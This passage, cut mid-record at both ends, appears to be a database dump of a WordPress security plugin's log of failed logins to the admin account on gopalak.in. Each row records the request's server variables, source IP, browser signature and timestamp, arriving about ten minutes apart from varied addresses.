00:00:00'),(93761,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41554\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744955008.9940059;s:12:\"REQUEST_TIME\";i:1744955008;}}','37.187.26.72',0,'2025-04-18 11:13:30','1970-01-01 00:00:00'),(93762,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60238\";s:11:\"REMOTE_ADDR\";s:12:\"176.74.26.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744955637.1607051;s:12:\"REQUEST_TIME\";i:1744955637;}}','176.74.26.54',0,'2025-04-18 11:23:58','1970-01-01 00:00:00'),(93763,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53466\";s:11:\"REMOTE_ADDR\";s:12:\"91.238.162.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744956257.261795;s:12:\"REQUEST_TIME\";i:1744956257;}}','91.238.162.8',0,'2025-04-18 11:34:19','1970-01-01 00:00:00'),(93764,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60502\";s:11:\"REMOTE_ADDR\";s:13:\"160.25.166.79\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744956880.8622689;s:12:\"REQUEST_TIME\";i:1744956880;}}','160.25.166.79',0,'2025-04-18 11:44:42','1970-01-01 00:00:00'),(93765,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39184\";s:11:\"REMOTE_ADDR\";s:13:\"183.82.35.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744957498.4542861;s:12:\"REQUEST_TIME\";i:1744957498;}}','183.82.35.191',0,'2025-04-18 11:55:00','1970-01-01 00:00:00'),(93766,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45270\";s:11:\"REMOTE_ADDR\";s:13:\"186.64.114.40\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744958135.503144;s:12:\"REQUEST_TIME\";i:1744958135;}}','186.64.114.40',0,'2025-04-18 12:05:37','1970-01-01 00:00:00'),(93767,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40428\";s:11:\"REMOTE_ADDR\";s:12:\"64.31.53.154\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744958772.24283;s:12:\"REQUEST_TIME\";i:1744958772;}}','64.31.53.154',0,'2025-04-18 12:16:14','1970-01-01 00:00:00'),(93768,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39602\";s:11:\"REMOTE_ADDR\";s:13:\"34.46.107.224\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744959416.3107309;s:12:\"REQUEST_TIME\";i:1744959416;}}','34.46.107.224',0,'2025-04-18 12:26:58','1970-01-01 00:00:00'),(93769,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51542\";s:11:\"REMOTE_ADDR\";s:13:\"49.238.228.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744960062.7100279;s:12:\"REQUEST_TIME\";i:1744960062;}}','49.238.228.30',0,'2025-04-18 12:37:44','1970-01-01 00:00:00'),(93770,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39452\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744960701.088861;s:12:\"REQUEST_TIME\";i:1744960701;}}','162.0.215.190',0,'2025-04-18 12:48:22','1970-01-01 00:00:00'),(93771,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49384\";s:11:\"REMOTE_ADDR\";s:11:\"185.2.4.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"